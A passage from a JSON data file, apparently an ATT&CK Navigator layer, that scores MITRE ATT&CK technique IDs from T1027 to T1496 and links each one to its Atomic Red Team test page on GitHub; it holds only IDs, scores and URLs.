t":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/
redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team
/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic
-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanar
yco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github
.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/
blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqu
eID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T
1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https:/
/github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github
.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/re
dcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T14
